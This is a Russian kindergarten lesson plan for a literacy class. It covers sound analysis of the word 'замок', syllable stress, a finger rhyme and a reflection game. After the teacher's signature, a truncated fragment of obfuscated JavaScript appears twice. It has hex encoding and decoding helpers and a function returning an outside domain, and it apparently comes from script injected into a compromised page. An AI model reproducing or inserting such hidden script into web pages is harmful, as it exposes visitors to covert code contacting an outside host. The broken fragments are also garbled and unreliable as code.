Конспект открытого занятия по обучению грамоте в старшей группе

Программное содержание: продолжать учить делать звуковой анализ пятибуквенных слов (замок), определять наличие заданного звука в слове, его место; учить определять ударный слог, познакомить со словообразовательной ролью ударения, упражнять в делении слов на слоги; закреплять представления о словах, обозначающих предметы, действия и признаки предметов, закреплять умения составлять предложения по заданной схеме, используя карточки-символы

Развивать внимание, воображение, логическое мышление

Воспитывать усидчивость, умение трудиться в коллективе, давать самооценку себе

Материал: цветные фишки для обозначения звуков, схемы для звукового анализа 5-звуковых слов,  картинки с изображением замка и замка, картинки с изображением вагончиков и по 3-4 карточки с изображениями различных предметов на каждого ребенка, схемы-символы слов, демонстрационные картины.

 

Ход занятия

Дети заходят в группу, становятся в круг. Воспитатель предлагает поприветствовать друг друга без слов: рукопожатием и улыбкой.

Вос-ль: Ребята, что вы чувствуете, взявшись за руки? (Тепло). Да, мы передали друг другу частичку тепла, своего сердечка. Какими вы будете сегодня на занятии? (воспитанными, внимательными, дружелюбными, усидчивыми, выдержанными и т.д.)

- Какой  день недели был вчера? Какой будет завтра? Какой сегодня день недели? Сегодня среда и у нас занятие по обучению грамоте. Мы с вами будем делить слова на слоги, учится находить ударный слог, будем составлять предложения и много другой работы.

- А для начала давайте сядем за столы согласно первого звука своего имени: «А», «С» и т.д.

- Молодцы. А теперь выровняйте спинки и поиграем в игру на внимание «Вопрос – ответ» (воспитатель задает вопрос, дети отвечают)

  • Из чего состоит наша речь?
  • Из чего состоят предложения?
  • Из чего состоит слово?
  • Какие бывают слова?
  • Из чего состоят слова?
  • Какие бывают звуки?
  • Какие бывают согласные звуки?

- Давайте вспомним, что обозначают эти символы:

Посмотрите на картину и назовите слова-предметы (дети называют). А теперь подберите к словам-предметам признаки, а теперь составьте предложение по схеме:

( Стоит серый слон. Сидит рыжая лиса…)

Физкультминутка

Звуковой анализ слова «замок»

Вос-ль: Чтобы узнать, какое слово мы сегодня будем анализировать, отгадайте загадку: «Не лает, не кусает, а в дом не пускает»

Послушайте и скажите, какие звуки составляют это слово (педагог утрированно произносит это слово)

- Сколько звуков в этом слове? Назовите первый звук? Какой это звук? Обозначьте его фишкой. (так анализируются все звуки)

- Сколько слогов в этом слове? Какой слог ударный? Произнесите слово, выделяя голосом ударный звук «о» (на схеме обозначают фишкой ударение)

- Давайте посмотрим что получится, если мы перенесем ударение на первый слог «за»: получилось новое слово «замок». Что такое «Замок» - это жилье для принцев и принцесс, а что такое «замок» - устройство для запирания двери

дети по указанию воспитателя собирают все фишки со схемы.

Пальчиковая гимнастика:

Воробей живет на крыше

В теплой норке домик мыши

У лягушки дом в пруду

Домик пеночки в саду

-Эй, цыпленок, где твой дом?

- Он у мамы под крылом!

- А теперь давайте с вами отправимся в путешествие на наших паровозиках. Игра «Путешествие»: из имеющихся картинок дети выбирают ту, на котором изображен предмет, в названии которого один слог и помещают в первый вагончик, затем находят слово с двумя слогами и т.д.

- Пока мы с вами «путешествовали» у нас на карточках завелся жук-буквоед и погрыз наши буквы. Давайте мы с вами их допишем (дети на индивидуальных карточках дописывают недостающие элементы букв)

Рефлексия проводится в форме игры «Положи сердечко к подходящей картинке»: каждый ребенок располагает свое сердечко под той картинкой, как он себя ощущал себя на занятии  и объясняет свой выбор («Радость», «Скука», «Удивление»).  Педагог дает оценку работы детей, выделяет наиболее результативно поработавших детей.

воспитатель Т.Е.Авнап

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "du.roo.ljuban.by"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "du.roo.ljuban.by"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

 

 
Выберите язык
Russian Belarusian Chinese (Traditional) English German